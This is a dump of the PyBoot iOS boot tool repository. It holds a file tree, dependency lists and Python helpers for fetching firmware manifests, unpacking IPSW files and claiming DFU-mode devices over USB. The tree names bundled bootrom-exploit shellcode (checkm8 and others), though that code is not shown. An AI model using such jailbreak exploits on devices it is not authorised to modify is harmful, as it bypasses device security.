├── .gitignore
├── LICENSE
├── README.md
├── pyboot.py
├── requirements.txt
└── resources
├── __init__.py
├── bin
├── Kernel64Patcher
├── dtree_patcher
├── eclipsa7000
├── eclipsa7001
├── eclipsa8000
├── eclipsa8003
├── iBoot64Patcher
├── iPwnder32
├── ibootim
├── img4
├── img4tool
├── irecovery
├── kairos
├── pzb
└── tsschecker
├── bootlogo.png
├── img4.py
├── iospythontools
├── __init__.py
├── iphonewiki.py
├── ipswapi.py
├── manifest.py
├── requirements.txt
└── utils.py
├── ipsw.py
├── ipwndfu
├── .gitignore
├── __init__.py
├── bin
│ ├── 0x8015.bin
│ ├── 24Kpwn-shellcode.bin
│ ├── SHAtter-shellcode.bin
│ ├── alloc8-shellcode.bin
│ ├── checkm8_arm64.bin
│ ├── checkm8_armv7.bin
│ ├── ibss-flash-nor-shellcode.bin
│ ├── limera1n-shellcode.bin
│ ├── steaks4uce-shellcode.bin
│ ├── t8010_t8011_disable_wxn_arm64.bin
│ ├── usb_0xA1_2_arm64.bin
│ └── usb_0xA1_2_armv7.bin
├── checkm8.py
├── device_platform.py
├── device_platform2.py
├── dfu.py
├── dfu2.py
├── libusbfinder
│ ├── __init__.py
│ └── bottles
│ │ ├── libusb-1.0.19.mountain_lion.bottle.1.tar.gz
│ │ ├── libusb-1.0.20.mavericks.bottle.1.tar.gz
│ │ ├── libusb-1.0.21.yosemite.bottle.tar.gz
│ │ ├── libusb-1.0.22.el_capitan.bottle.tar.gz
│ │ ├── libusb-1.0.22.high_sierra.bottle.tar.gz
│ │ ├── libusb-1.0.22.mojave.bottle.tar.gz
│ │ └── libusb-1.0.22.sierra.bottle.tar.gz
├── rmsigchks.py
├── usb
│ ├── ACKNOWLEDGEMENTS
│ ├── LICENSE
│ ├── README.rst
│ ├── __init__.py
│ ├── _debug.py
│ ├── _interop.py
│ ├── _lookup.py
│ ├── _objfinalizer.py
│ ├── backend
│ │ ├── __init__.py
│ │ ├── libusb0.py
│ │ ├── libusb1.py
│ │ └── openusb.py
│ ├── control.py
│ ├── core.py
│ ├── legacy.py
│ ├── libloader.py
│ └── util.py
├── usbexec.py
├── usbexec2.py
└── utilities.py
├── ipwndfu8010
├── .gitignore
├── JAILBREAK-GUIDE.md
├── LICENSE
├── Makefile
├── README.md
├── SHAtter.py
├── aes-keys
│ └── S5L8920-firmware
├── alloc8.py
├── bin
│ ├── 24Kpwn-shellcode.bin
│ ├── SHAtter-shellcode.bin
│ ├── alloc8-shellcode.bin
│ ├── checkm8_arm64.bin
│ ├── checkm8_armv7.bin
│ ├── ibss-flash-nor-shellcode.bin
│ ├── limera1n-shellcode.bin
│ ├── steaks4uce-shellcode.bin
│ ├── t8010_t8011_disable_wxn_arm64.bin
│ ├── usb_0xA1_2_arm64.bin
│ └── usb_0xA1_2_armv7.bin
├── checkm8.py
├── device_platform.py
├── dfu.py
├── dfuexec.py
├── ibootpatcher
├── image3.py
├── image3_24Kpwn.py
├── ipwndfu
├── ipwnrecovery
├── libusbfinder
│ ├── __init__.py
│ └── bottles
│ │ ├── libusb-1.0.19.mountain_lion.bottle.1.tar.gz
│ │ ├── libusb-1.0.20.mavericks.bottle.1.tar.gz
│ │ ├── libusb-1.0.21.yosemite.bottle.tar.gz
│ │ ├── libusb-1.0.22.el_capitan.bottle.tar.gz
│ │ ├── libusb-1.0.22.high_sierra.bottle.tar.gz
│ │ ├── libusb-1.0.22.mojave.bottle.tar.gz
│ │ └── libusb-1.0.22.sierra.bottle.tar.gz
├── limera1n.py
├── nor-backups
│ └── README
├── nor.py
├── recovery.py
├── repo
│ └── ipwndfu.png
├── rmsigchks.py
├── src
│ ├── 24Kpwn-shellcode.S
│ ├── SHAtter-shellcode.S
│ ├── alloc8-shellcode.S
│ ├── checkm8_arm64.S
│ ├── checkm8_armv7.S
│ ├── ibss-flash-nor-shellcode.S
│ ├── limera1n-shellcode.S
│ ├── steaks4uce-shellcode.S
│ ├── t8010_t8011_disable_wxn_arm64.S
│ ├── usb_0xA1_2_arm64.S
│ └── usb_0xA1_2_armv7.S
├── steaks4uce.py
├── usb
│ ├── ACKNOWLEDGEMENTS
│ ├── LICENSE
│ ├── README.rst
│ ├── __init__.py
│ ├── _debug.py
│ ├── _interop.py
│ ├── _lookup.py
│ ├── _objfinalizer.py
│ ├── backend
│ │ ├── __init__.py
│ │ ├── libusb0.py
│ │ ├── libusb1.py
│ │ └── openusb.py
│ ├── control.py
│ ├── core.py
│ ├── legacy.py
│ ├── libloader.py
│ └── util.py
├── usbexec.py
└── utilities.py
├── ipwndfuKeys
├── .gitignore
├── JAILBREAK-GUIDE.md
├── LICENSE
├── Makefile
├── README.md
├── SHAtter.py
├── aes-keys
│ └── S5L8920-firmware
├── alloc8.py
├── bin
│ ├── 24Kpwn-shellcode.bin
│ ├── SHAtter-shellcode.bin
│ ├── alloc8-shellcode.bin
│ ├── checkm8_arm64.bin
│ ├── checkm8_armv7.bin
│ ├── checkm8_nopaddingcorruption_arm64.bin
│ ├── ibss-flash-nor-shellcode.bin
│ ├── limera1n-shellcode.bin
│ ├── steaks4uce-shellcode.bin
│ ├── t8010_t8011_disable_wxn_arm64.bin
│ ├── t8015_shellcode_arm64.bin
│ ├── usb_0xA1_2_arm64.bin
│ └── usb_0xA1_2_armv7.bin
├── checkm8.py
├── device_platform.py
├── dfu.py
├── dfuexec.py
├── ibootpatcher
├── image3.py
├── image3_24Kpwn.py
├── ipwndfu
├── ipwnrecovery
├── libusbfinder
│ ├── __init__.py
│ └── bottles
│ │ ├── libusb-1.0.19.mountain_lion.bottle.1.tar.gz
│ │ ├── libusb-1.0.20.mavericks.bottle.1.tar.gz
│ │ ├── libusb-1.0.21.yosemite.bottle.tar.gz
│ │ ├── libusb-1.0.22.el_capitan.bottle.tar.gz
│ │ ├── libusb-1.0.22.high_sierra.bottle.tar.gz
│ │ ├── libusb-1.0.22.mojave.bottle.tar.gz
│ │ └── libusb-1.0.22.sierra.bottle.tar.gz
├── limera1n.py
├── nor-backups
│ └── README
├── nor.py
├── recovery.py
├── repo
│ └── ipwndfu.png
├── src
│ ├── 24Kpwn-shellcode.S
│ ├── SHAtter-shellcode.S
│ ├── alloc8-shellcode.S
│ ├── checkm8_arm64.S
│ ├── checkm8_armv7.S
│ ├── checkm8_nopaddingcorruption_arm64.S
│ ├── ibss-flash-nor-shellcode.S
│ ├── limera1n-shellcode.S
│ ├── steaks4uce-shellcode.S
│ ├── t8010_t8011_disable_wxn_arm64.S
│ ├── t8015_shellcode_arm64.S
│ ├── usb_0xA1_2_arm64.S
│ └── usb_0xA1_2_armv7.S
├── steaks4uce.py
├── usb
│ ├── ACKNOWLEDGEMENTS
│ ├── LICENSE
│ ├── README.rst
│ ├── __init__.py
│ ├── _debug.py
│ ├── _interop.py
│ ├── _lookup.py
│ ├── _objfinalizer.py
│ ├── backend
│ │ ├── __init__.py
│ │ ├── libusb0.py
│ │ ├── libusb1.py
│ │ └── openusb.py
│ ├── control.py
│ ├── core.py
│ ├── legacy.py
│ ├── libloader.py
│ └── util.py
├── usbexec.py
└── utilities.py
├── ipwndfuX
├── .gitignore
├── JAILBREAK-GUIDE.md
├── LICENSE
├── Makefile
├── README.md
├── SHAtter.py
├── aes-keys
│ └── S5L8920-firmware
├── alloc8.py
├── bin
│ ├── 0x8015.bin
│ ├── 24Kpwn-shellcode.bin
│ ├── SHAtter-shellcode.bin
│ ├── alloc8-shellcode.bin
│ ├── checkm8_arm64.bin
│ ├── checkm8_armv7.bin
│ ├── ibss-flash-nor-shellcode.bin
│ ├── limera1n-shellcode.bin
│ ├── steaks4uce-shellcode.bin
│ ├── t8010_t8011_disable_wxn_arm64.bin
│ ├── t8015_shellcode_arm64.bin
│ ├── usb_0xA1_2_arm64.bin
│ └── usb_0xA1_2_armv7.bin
├── checkm8.py
├── device_platform.py
├── dfu.py
├── dfuexec.py
├── ibootpatcher
├── image3.py
├── image3_24Kpwn.py
├── ipwndfu
├── ipwnrecovery
├── libusbfinder
│ ├── __init__.py
│ └── bottles
│ │ ├── libusb-1.0.19.mountain_lion.bottle.1.tar.gz
│ │ ├── libusb-1.0.20.mavericks.bottle.1.tar.gz
│ │ ├── libusb-1.0.21.yosemite.bottle.tar.gz
│ │ ├── libusb-1.0.22.el_capitan.bottle.tar.gz
│ │ ├── libusb-1.0.22.high_sierra.bottle.tar.gz
│ │ ├── libusb-1.0.22.mojave.bottle.tar.gz
│ │ └── libusb-1.0.22.sierra.bottle.tar.gz
├── limera1n.py
├── nor-backups
│ └── README
├── nor.py
├── recovery.py
├── repo
│ └── ipwndfu.png
├── src
│ ├── 0x8015.S
│ ├── 24Kpwn-shellcode.S
│ ├── SHAtter-shellcode.S
│ ├── alloc8-shellcode.S
│ ├── checkm8_arm64.S
│ ├── checkm8_armv7.S
│ ├── ibss-flash-nor-shellcode.S
│ ├── limera1n-shellcode.S
│ ├── steaks4uce-shellcode.S
│ ├── t8010_t8011_disable_wxn_arm64.S
│ ├── t8015_shellcode_arm64.S
│ ├── usb_0xA1_2_arm64.S
│ └── usb_0xA1_2_armv7.S
├── steaks4uce.py
├── usb
│ ├── ACKNOWLEDGEMENTS
│ ├── LICENSE
│ ├── README.rst
│ ├── __init__.py
│ ├── _debug.py
│ ├── _interop.py
│ ├── _lookup.py
│ ├── _objfinalizer.py
│ ├── backend
│ │ ├── __init__.py
│ │ ├── libusb0.py
│ │ ├── libusb1.py
│ │ └── openusb.py
│ ├── control.py
│ ├── core.py
│ ├── legacy.py
│ ├── libloader.py
│ └── util.py
├── usbexec.py
└── utilities.py
├── kc.bpatch
└── pwn.py
/.gitignore:
--------------------------------------------------------------------------------
1 | .DS_Store
2 | *.json
3 | *.pyc
4 | *.im4p
5 | *.img4
6 | *.shsh
7 | *.shsh2
8 | *.patched
9 | *.raw
10 | *.pwn
11 | .irecovery
12 | IPSW/
13 | SSH/
14 | venv
15 | *.dmg
16 | resources/manifest.plist
17 | *.lock
18 | resources/bootlogo.ibootim
19 |
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | astroid==2.3.3
2 | autopep8==1.5
3 | beautifulsoup4==4.8.2
4 | bs4==0.0.1
5 | certifi==2019.11.28
6 | chardet==3.0.4
7 | idna==2.8
8 | isort==4.3.21
9 | lazy-object-proxy==1.4.3
10 | mccabe==0.6.1
11 | pycodestyle==2.5.0
12 | pycparser==2.19
13 | pylint==2.4.4
14 | pyusb==1.0.2
15 | remotezip==0.9.2
16 | requests==2.22.0
17 | six==1.14.0
18 | soupsieve==2.0
19 | tabulate==0.8.6
20 | typed-ast==1.4.1
21 | urllib3==1.26.5
22 | wrapt==1.11.2
23 |
--------------------------------------------------------------------------------
/resources/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/__init__.py
--------------------------------------------------------------------------------
/resources/bin/Kernel64Patcher:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/bin/Kernel64Patcher
--------------------------------------------------------------------------------
/resources/bin/dtree_patcher:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/bin/dtree_patcher
--------------------------------------------------------------------------------
/resources/bin/eclipsa7000:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/bin/eclipsa7000
--------------------------------------------------------------------------------
/resources/bin/eclipsa7001:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/bin/eclipsa7001
--------------------------------------------------------------------------------
/resources/bin/eclipsa8000:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/bin/eclipsa8000
--------------------------------------------------------------------------------
/resources/bin/eclipsa8003:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/bin/eclipsa8003
--------------------------------------------------------------------------------
/resources/bin/iBoot64Patcher:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/bin/iBoot64Patcher
--------------------------------------------------------------------------------
/resources/bin/iPwnder32:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/bin/iPwnder32
--------------------------------------------------------------------------------
/resources/bin/ibootim:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/bin/ibootim
--------------------------------------------------------------------------------
/resources/bin/img4:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/bin/img4
--------------------------------------------------------------------------------
/resources/bin/img4tool:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/bin/img4tool
--------------------------------------------------------------------------------
/resources/bin/irecovery:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/bin/irecovery
--------------------------------------------------------------------------------
/resources/bin/kairos:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/bin/kairos
--------------------------------------------------------------------------------
/resources/bin/pzb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/bin/pzb
--------------------------------------------------------------------------------
/resources/bin/tsschecker:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/bin/tsschecker
--------------------------------------------------------------------------------
/resources/bootlogo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/bootlogo.png
--------------------------------------------------------------------------------
/resources/iospythontools/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/iospythontools/__init__.py
--------------------------------------------------------------------------------
/resources/iospythontools/manifest.py:
--------------------------------------------------------------------------------
1 | import json
2 | import os
3 | import re
4 |
5 | from remotezip import RemoteZip
6 |
7 | from resources.iospythontools.ipswapi import APIParser
8 |
9 |
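class Manifest(object):  # TODO Add OTA compatibility
    """Download and read the BuildManifest.plist for one device/version pair.

    File names are built by interpolating ``device``, ``version`` and the
    build id unchanged, and everything is written to the current working
    directory, so callers should pass plain identifiers without path
    separators.
    """

    def __init__(self, device, version):
        super().__init__()
        self.device = device
        self.version = version

    def downloadBuildManifest(self):
        """Extract BuildManifest.plist from the matching remote IPSW.

        The result is saved in the current working directory as
        ``BuildManifest_<device>_<version>_<buildid>.plist``.

        Raises:
            IndexError: if no firmware entry in ``<device>.json`` carries the
                build id reported by the API parser.
        """
        api = APIParser(self.device, self.version)
        buildid = api.iOSToBuildid()
        # Presumably this call writes '<device>.json', which is read below;
        # verify against APIParser.
        api.linksForDevice('ipsw')

        with open(f'{self.device}.json', 'r') as file:
            data = json.load(file)

        # Bounded search: a missing build id now fails with a clear message
        # instead of indexing past the end of the list.
        url = None
        for firmware in data['firmwares']:
            if firmware['buildid'] == buildid:
                url = firmware['url']
                break
        if url is None:
            raise IndexError(f'no firmware entry with buildid {buildid} in {self.device}.json')

        manifest = 'BuildManifest.plist'

        # NOTE(review): the URL is taken from the JSON file as-is and the
        # extracted manifest is not checked against any hash or signature;
        # treat its contents as untrusted input.
        # The context manager closes the remote archive even if extract() fails.
        with RemoteZip(url) as archive:
            archive.extract(manifest)

        # This can be done better
        os.rename(manifest, f'BuildManifest_{self.device}_{self.version}_{buildid}.plist')

    def manifestParser(self):
        """Return the manifest as a list of lines with tab characters removed.

        Downloads the manifest first when the expected file is not present in
        the current working directory.
        """
        api = APIParser(self.device, self.version)
        buildid = api.iOSToBuildid()
        manifest = f'BuildManifest_{self.device}_{self.version}_{buildid}.plist'

        if not os.path.exists(manifest):
            self.downloadBuildManifest()

        with open(manifest, 'r') as f:
            return f.read().replace('\t', '').splitlines()

    def getCodename(self):
        """Return the line following 'BuildTrain' with markup tags stripped.

        The manifest file is deleted once the value has been read.
        """
        api = APIParser(self.device, self.version)
        buildid = api.iOSToBuildid()
        manifest = f'BuildManifest_{self.device}_{self.version}_{buildid}.plist'
        data = self.manifestParser()
        # NOTE(review): list.index() needs a line equal to 'BuildTrain'
        # exactly and raises ValueError otherwise; confirm the parsed lines
        # really have that form.
        control = data.index('BuildTrain')
        codename = re.sub('<[^>]*>', '', data[control + 1])  # Cheeky HTML tag removal :D
        os.remove(manifest)
        return codename

    def getBasebandVersion(self):
        """Print the index of the first 'BasebandFirmware' line (unfinished)."""
        data = self.manifestParser()
        control = data.index('BasebandFirmware')  # 33, wrong, need the second (not particularly bad)
        print(control)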
72 |
--------------------------------------------------------------------------------
/resources/iospythontools/requirements.txt:
--------------------------------------------------------------------------------
1 | astroid==2.3.3
2 | autopep8==1.4.4
3 | beautifulsoup4==4.8.1
4 | bs4==0.0.1
5 | certifi==2019.11.28
6 | chardet==3.0.4
7 | device-detector==0.9
8 | idna==2.8
9 | isort==4.3.21
10 | lazy-object-proxy==1.4.3
11 | mccabe==0.6.1
12 | pycodestyle==2.5.0
13 | pylint==2.4.4
14 | PyYAML==5.4
15 | regex==2019.12.9
16 | remotezip==0.9.2
17 | requests==2.22.0
18 | six==1.13.0
19 | soupsieve==1.9.5
20 | tabulate==0.8.6
21 | typed-ast==1.4.0
22 | urllib3==1.26.5
23 | wrapt==1.11.2
24 |
--------------------------------------------------------------------------------
/resources/iospythontools/utils.py:
--------------------------------------------------------------------------------
1 | import json
2 | import os
3 | import sys
4 | import time
5 | from math import floor
6 | from urllib.parse import urlsplit
7 | from urllib.request import urlopen
8 |
9 | from remotezip import RemoteZip
10 |
11 | """
12 |
13 | All of the helper functions or just a module to store other functions
14 | that don't have a particular module that its similar to.
15 |
16 | Basically just 'tools'.
17 |
18 | """
19 |
20 | # Maybe convert progress into my own custom file downloader that auto grabs the data such as filesize, duration, etc.
21 |
22 |
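def progress(count, block_size, total_size):  # Check README for credit (not mine)
    """Print a one-line download progress report to stdout.

    The signature matches the ``reporthook`` callback of
    ``urllib.request.urlretrieve``. The first call (``count == 0``) only
    records the start time in the module-level ``start_time``.

    Args:
        count: Number of blocks transferred so far.
        block_size: Size of one block in bytes.
        total_size: Total size in bytes; zero or negative means unknown.
    """
    global start_time
    if count == 0:
        start_time = time.time()
        return
    duration = time.time() - start_time
    progress_size = int(count * block_size)
    # A coarse clock can report zero elapsed time; avoid dividing by it.
    speed = int(progress_size / (1024 * duration)) if duration > 0 else 0
    if total_size > 0:
        # The last block may overshoot the real size, so cap at 100.
        percent = min(100, int(count * block_size * 100 / total_size))
    else:
        # Unknown or empty total: no meaningful percentage to show.
        percent = '?'
    sys.stdout.write(f'\r{percent}%, {floor(progress_size / (1024 * 1024))} MB, {speed} KB/s, {floor(duration)} seconds passed')
    sys.stdout.flush()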
34 |
35 |
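def downloadJSONData(url, filename):
    """Fetch JSON from ``url`` and write it, indented, to ``<filename>.json``.

    Args:
        url: Location to read; passed to ``urlopen`` unchanged.
        filename: Output path without the ``.json`` suffix.
    """
    # NOTE(review): urlopen() accepts every scheme urllib supports (file:
    # included) and no timeout is set here, so ``url`` must come from a
    # trusted source.
    # The context manager closes the response even if parsing fails.
    with urlopen(url) as response:
        payload = json.loads(response.read())
    with open(f'{filename}.json', 'w') as file:
        json.dump(payload, file, indent=4)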
42 |
43 |
def splitToFileName(path):
    """Return the final segment of the path component of a URL."""
    url_path = urlsplit(path).path
    # Query string and fragment are already excluded by urlsplit().
    return url_path.rsplit('/', 1)[-1]
48 |
49 |
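def splitKbag(kbag):
    """Split a 96-character keybag string into its IV and key parts.

    Args:
        kbag: String of exactly 96 characters.

    Returns:
        ``'IV: <first 32 chars> Key: <last 64 chars>'``.

    Raises:
        SystemExit: if ``kbag`` is not 96 characters long.
    """
    if len(kbag) != 96:
        # sys.exit() takes a single argument; passing the length as a second
        # one raised TypeError instead of showing this message.
        sys.exit(f'String provided is not 96 bytes! The length read was: {len(kbag)}')
    iv = kbag[:32]
    key = kbag[-64:]
    return f'IV: {iv} Key: {key}'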
57 |
58 |
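def clean():
    """Delete every ``.json`` file in the current working directory.

    This removes any matching file, not only the ones this tool created, so
    run it from a directory dedicated to the tool.
    """
    for entry in os.listdir(os.getcwd()):
        # Require the real '.json' extension and a regular file: a bare
        # 'json' suffix also matched unrelated names, and os.remove() fails
        # on directories.
        if entry.endswith('.json') and os.path.isfile(entry):
            os.remove(entry)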
63 |
--------------------------------------------------------------------------------
/resources/ipsw.py:
--------------------------------------------------------------------------------
1 | import plistlib
2 | import sys
3 | import os
4 | import shutil
5 | from zipfile import ZipFile, is_zipfile
6 |
def readmanifest(path, flag):
    """Read one value from a plist manifest.

    Args:
        path: Path of the plist file.
        flag: When truthy, return ``ProductVersion``; otherwise return the
            ``SupportedProductTypes`` value rendered as text with the
            characters ``[``, ``'`` and ``]`` removed.
    """
    with open(path, 'rb') as handle:
        manifest = plistlib.load(handle)

    if flag:
        return manifest['ProductVersion']

    models = str(manifest['SupportedProductTypes'])
    for unwanted in ("[", "'", "]"):
        models = models.replace(unwanted, "")
    return models
21 |
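def unzipIPSW(path):
    """Unpack an IPSW into ./IPSW and move its DFU files to the top of it.

    Any existing ``IPSW`` directory in the current working directory is
    deleted first. After extraction every entry of ``IPSW/Firmware/dfu`` is
    moved directly into ``IPSW``.

    Args:
        path: Path of the ``.ipsw`` file (a zip archive).

    Raises:
        SystemExit: if ``path`` is not a zip archive.
    """
    if is_zipfile(path):  # ipsw's are just zip files, so check that first.
        print(f'{path} is a zip archive!')
    else:
        sys.exit(f'"{path}" is not a zip archive! Are you sure you inserted the correct ipsw path?')

    print("Starting IPSW unzipping")
    outputFolder = "IPSW"
    fname = str(path.rstrip())

    # Start from a clean output directory; extractall() recreates it.
    if os.path.exists(outputFolder):
        shutil.rmtree(outputFolder)

    # The original test compared the bound method itself to a string
    # (``fname.endswith!=(".ipsw")``), so the extension was never checked
    # here. A re-entered path is also re-validated as a zip archive.
    while not os.path.exists(fname) or not fname.endswith(".ipsw") or not is_zipfile(fname):
        print("Invalid filepath/filename.\nPlease try again with a valid filepath/filename.")
        fname = input("Enter the path to the IPSW file (Or drag and drop the IPSW into this window):\n")
        fname = str(fname.rstrip())

    print("IPSW found at given path...")
    print("Cleaning up old files...")
    print("Unzipping..")

    # ZipFile.extractall() strips absolute paths and '..' components from
    # member names, but puts no limit on the unpacked size; only use IPSW
    # files from a source you trust.
    with ZipFile(fname, 'r') as zip_ref:
        zip_ref.extractall(outputFolder)

    source = os.path.join(outputFolder, "Firmware", "dfu")
    dest = os.path.join(os.getcwd(), outputFolder)
    for f in os.listdir(source):
        shutil.move(os.path.join(source, f), dest)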
63 |
--------------------------------------------------------------------------------
/resources/ipwndfu/.gitignore:
--------------------------------------------------------------------------------
1 | *.pyc
2 | nor-backups/nor-*
3 | libusbfinder/libusb-*
4 | SecureROM-*
5 | n88ap-iBSS-4.3.5.img3
6 | *.ipsw
7 | .*.swp
8 |
--------------------------------------------------------------------------------
/resources/ipwndfu/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu/__init__.py
--------------------------------------------------------------------------------
/resources/ipwndfu/bin/0x8015.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu/bin/0x8015.bin
--------------------------------------------------------------------------------
/resources/ipwndfu/bin/24Kpwn-shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu/bin/24Kpwn-shellcode.bin
--------------------------------------------------------------------------------
/resources/ipwndfu/bin/SHAtter-shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu/bin/SHAtter-shellcode.bin
--------------------------------------------------------------------------------
/resources/ipwndfu/bin/alloc8-shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu/bin/alloc8-shellcode.bin
--------------------------------------------------------------------------------
/resources/ipwndfu/bin/checkm8_arm64.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu/bin/checkm8_arm64.bin
--------------------------------------------------------------------------------
/resources/ipwndfu/bin/checkm8_armv7.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu/bin/checkm8_armv7.bin
--------------------------------------------------------------------------------
/resources/ipwndfu/bin/ibss-flash-nor-shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu/bin/ibss-flash-nor-shellcode.bin
--------------------------------------------------------------------------------
/resources/ipwndfu/bin/limera1n-shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu/bin/limera1n-shellcode.bin
--------------------------------------------------------------------------------
/resources/ipwndfu/bin/steaks4uce-shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu/bin/steaks4uce-shellcode.bin
--------------------------------------------------------------------------------
/resources/ipwndfu/bin/t8010_t8011_disable_wxn_arm64.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu/bin/t8010_t8011_disable_wxn_arm64.bin
--------------------------------------------------------------------------------
/resources/ipwndfu/bin/usb_0xA1_2_arm64.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu/bin/usb_0xA1_2_arm64.bin
--------------------------------------------------------------------------------
/resources/ipwndfu/bin/usb_0xA1_2_armv7.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewPierson/PyBoot/3502c0919c08b78fc15dd1c5946356831b1c8d10/resources/ipwndfu/bin/usb_0xA1_2_armv7.bin
--------------------------------------------------------------------------------
/resources/ipwndfu/dfu.py:
--------------------------------------------------------------------------------
1 | import sys, time
2 | import usb # pyusb: use 'pip install pyusb' to install this module
3 | import usb.backend.libusb1
4 | from resources.ipwndfu import libusbfinder
5 | #try:
6 | #from resources.ipwndfu import libusbfinder
7 | #except ImportError:
8 | #import libusbfinder
9 |
# Largest payload (0x800 = 2048 bytes) moved per control transfer by
# send_data() and get_data().
MAX_PACKET_SIZE = 0x800
11 |
def acquire_device(timeout=30.0, match=None, fatal=True):
    """Find a USB device with idVendor 0x5AC / idProduct 0x1227 and claim it.

    Args:
        timeout: Seconds to keep polling; at least one scan always runs.
        match: Optional substring that must occur in the serial number.
        fatal: When true, print an error and exit with status 1 if nothing
            is found; otherwise return None.

    Returns:
        The first matching device, with interface 0 claimed, or None.
    """
    libusb = usb.backend.libusb1.get_backend(find_library=lambda x: libusbfinder.libusb1_path())
    began = time.time()
    first_pass = True
    # Scan once unconditionally, then repeat until the timeout has elapsed.
    while first_pass or time.time() - began < timeout:
        first_pass = False
        candidates = usb.core.find(find_all=True, idVendor=0x5AC, idProduct=0x1227, backend=libusb)
        for device in candidates:
            if match is None or match in device.serial_number:
                usb.util.claim_interface(device, 0)
                return device
        time.sleep(0.001)
    if not fatal:
        return None
    print('ERROR: No Apple device in DFU Mode 0x1227 detected after %0.2f second timeout. Exiting.' % timeout)
    print("Place the device into DFU mode again and re-run Vieux")
    sys.exit(1)
31 |
def release_device(device):
    """Release the resources pyusb holds for ``device``."""
    usb.util.dispose_resources(device)
35 |
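def reset_counters(device):
    """Send the 0x21 / request 4 control transfer and require a 0 result.

    Raises:
        AssertionError: if the transfer does not return 0.
    """
    # Keep the transfer out of an assert statement: ``python -O`` strips
    # asserts, which would silently skip the request itself.
    status = device.ctrl_transfer(0x21, 4, 0, 0, 0, 1000)
    if status != 0:
        raise AssertionError('ctrl_transfer(0x21, 4) returned %r, expected 0' % (status,))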
39 |
def usb_reset(device):
    """Reset the device's USB port, ignoring a USBError from the reset."""
    try:
        device.reset()
    except usb.core.USBError:
        # Deliberately ignored: per the original author this does not happen
        # on Yosemite but does on El Capitan and Sierra, and the reset
        # should still work.
        return
48 |
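def send_data(device, data):
    """Send ``data`` in chunks of at most MAX_PACKET_SIZE bytes.

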